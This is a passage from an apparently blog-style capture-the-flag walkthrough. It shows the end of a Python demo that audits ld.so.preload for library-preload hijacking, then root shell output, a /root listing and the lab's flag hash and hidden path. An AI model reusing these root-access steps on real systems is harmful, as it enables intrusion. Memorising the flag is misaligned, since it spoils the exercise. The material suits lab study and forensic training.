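        fh.write("not really an ELF file\n")
    os.chmod(lib, 0o666)
    preload = os.path.join(tmp, "ld.so.preload")
    with open(preload, "w") as fh:
        fh.write(lib + "\n/lib/does-not-exist.so\n")
    os.chmod(preload, 0o644)
    return audit_ld_so_preload(preload)


if __name__ == "__main__":
    for finding in demo() or ["no ld.so.preload present"]:
        print(finding)
```

Pointing the function at the default path on a live host gives the same report for the real file; the modification time it prints is the first thing to line up against the web server's access logs when reconstructing a timeline like the one in this walkthrough.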

Upon execution, we obtained a root shell, which I confirmed using the whoami command. 

# whoami                                                                                                                                       
whoami                                                                                                                                         
root                                                                                                                                           
#                                                                                                                                     

Since we have a root shell, let's change the directory to /root and check if we can find the root flag.

# cd /root                                                                                                                                     
cd /root                                                                                                                                       
# ls -al                                                                                                                                       
ls -al                                                                                                                                         
total 44                                                                                                                                       
drwx------  3 root root 4096 Apr 29  2018 .                                                                                                    
drwxr-xr-x 22 root root 4096 Apr 24  2018 ..                                                                                                   
-rw-r--r--  1 root root   19 May  3  2018 .bash_history                                                                                        
-rw-r--r--  1 root root 3106 Feb 19  2014 .bashrc                                                                                              
drwx------  2 root root 4096 Apr 28  2018 .cache                                                                                               
-rw-------  1 root root  144 Apr 29  2018 .flag.txt                                                                                             
-rw-r--r--  1 root root  140 Feb 19  2014 .profile
-rw-------  1 root root 1024 Apr 23  2018 .rnd
-rw-------  1 root root 8296 Apr 29  2018 .viminfo
# cat .flag.txt
cat .flag.txt                                                                                                                                  
Alec told me to place the codes here:                                                                                                          
                                                                                                                                               
568628e0d993b1973adc718237da6e93                                                                                                               
                                                                                                                                               
If you captured this make sure to go here.....                                                                                                 
/006-final/xvf7-flag/                                                                                                                           
                                                                                                                                               
#     

Let's visit the URL:

If you have any doubts or queries, write to me in the comment section. See you next,
